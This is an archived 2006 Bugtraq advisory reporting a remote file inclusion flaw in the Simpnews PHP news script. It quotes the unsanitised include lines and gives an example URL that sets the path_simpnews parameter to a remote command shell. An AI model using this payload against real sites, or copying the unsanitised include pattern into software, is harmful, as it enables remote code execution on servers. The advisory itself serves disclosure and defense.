Simpnews <= All version - Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Simpnews <= All version - Remote File Include Vulnerabilities
From: SpC-x@xxxxxxxxxxx
Date: 13 Jun 2006 05:19:31 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# SaVSaK.CoM | SpC-x - The-BeKiR |

# Simpnews <= All version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : Simpnews

# Credits : SpC-x - The-BeKiR

# Thanks : Ejder - FasTBoY - ERNE - RMx

# Code : 

# require_once($path_simpnews.'/langchk.php');
# include_once('./language/lang_'.$act_lang.'.php');
# require_once('./includes/get_settings.inc');
# require_once('./includes/wap_get_settings.inc');

# Vulnerable :

# http://www.victim.com/Simpnews/wap_short_news.php?path_simpnews=Command-Shell

Follow-Ups:
- Re: Simpnews <= All version - Remote File Include Vulnerabilities
  - From: str0ke

Prev by Date: VBZooM <<--V1.01 "language.php" SQL injection
Next by Date: multiple Xss exploits in 35mmslidegallery V6
Previous by thread: VBZooM <<--V1.01 "language.php" SQL injection
Next by thread: Re: Simpnews <= All version - Remote File Include Vulnerabilities
Index(es):
- Date
- Thread